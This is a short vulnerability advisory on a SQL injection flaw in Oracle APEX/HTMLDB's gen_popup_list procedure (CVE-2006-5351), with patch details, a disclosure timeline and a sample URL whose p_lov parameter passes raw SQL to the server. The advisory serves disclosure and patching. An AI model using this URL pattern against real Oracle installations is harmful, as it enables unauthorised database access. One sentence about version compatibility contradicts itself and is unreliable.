|
|
| |
Credit:
The information has been provided by Alexander Kornbrust.
The original article can be found at: http://www.red-database-security.com/advisory/oracle_apex_sql_injection_wwv_flow_utilities.html
|
| |
Affected Products:
This bug is fixed with 2.2 of APEX which is not part of the Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB installation to 2.2 or better 2.2.1.. Keep in mind that APEX 2.2 is NOT running on Oracle Application Express. Patches are currently not available for Oracle Application Express.
Sample URL:
http://apex:7777/pls/htmldb/wwv_flow_utilities.gen_popup_list?p_filterme=p_t02&p_element_index=1
&p_hidden_elem_name=p_t01&p_form_index=0&p_max_elements=&p_escape_html=&
p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session_id=15108399238201864297&
p_eval_value=&p_return_key=YES&p_translation=N&p_lov=select%20cust_last_name ||%20'%2C%20'%20||%20cust_first_name%20d%2C%20customer_id%20r%20from demo_customers%20order%20by%20cust_last_name&
p_lov_checksum=82C7EFB6FA3A2FA2C6E1A70FB63BB064
Patch Information:
This bug is fixed with Apex 2.2 or higher.
History:
03-oct-2005 Oracle secalert was informed
04-oct-2005 Bug confirmed
17-oct-2006 Oracle published CPU October 2006 and recommends to update to 2.2.1
18-oct-2006 Red-Database-Security published this advisory
23-oct-2006 minor changes (Sample URL added)
CVE Information:
CVE-2006-5351
|
|
|
